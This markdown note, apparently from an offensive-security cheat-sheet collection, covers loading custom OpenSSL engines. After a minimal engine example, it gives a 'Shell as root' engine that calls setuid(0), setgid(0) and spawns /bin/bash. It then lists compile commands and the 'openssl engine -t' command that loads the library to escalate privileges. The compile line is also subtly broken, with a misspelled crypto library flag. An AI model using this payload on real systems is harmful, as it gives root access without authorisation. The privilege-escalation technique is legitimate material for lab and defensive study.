killchain-compendium/crypto/openssl/openssl_engine.md

45 lines
743 B
Markdown

# OpenSSL Engine
* Hook external libs
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
* Most minimal example
```C
#include <openssl/engine.h>
static int bind(ENGINE *e, const char *id)
{
return 1;
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Shell as root
```C
#include <openssl/engine.h>
#include <unistd.h>
static int bind(ENGINE *e, const char *id)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Compile
```C
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
```
* Execute via
```sh
openssl engine -t `pwd`/rootshell.so
```